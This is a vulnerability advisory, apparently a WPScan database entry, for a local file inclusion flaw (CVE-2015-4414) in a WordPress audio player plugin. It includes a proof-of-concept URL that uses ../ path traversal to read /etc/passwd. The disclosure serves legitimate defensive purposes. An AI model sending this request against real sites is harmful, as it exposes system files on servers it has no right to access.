SE HTML5 Album Audio Player <= 1.1.0 - Local File Include

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a local file include vulnerability. The download_audio.php file does not check to see
if the user is authenticated, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.
Proof of Concept
http://www.example.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd

Affects

Plugin se-html5-album-audio-player

References

CVE 2015-4414
EXPLOITDB 37274
PACKETSTORM 132266
URL http://www.vapid.dhs.org/advisory.php?v=124
URL https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wp_se_html5_album_audioplayer_file_read.rb

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter Larry Cashdollar
Submitter Website http://www.vapid.dhs.org/
Submitter Twitter _larry0
Views 166
Verified No
WPVDB ID 8032

Timeline

Publicly Published 2015-06-06 (over 1 year ago)
Added 2015-06-08 (over 1 year ago)
Last Updated 2015-09-20 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.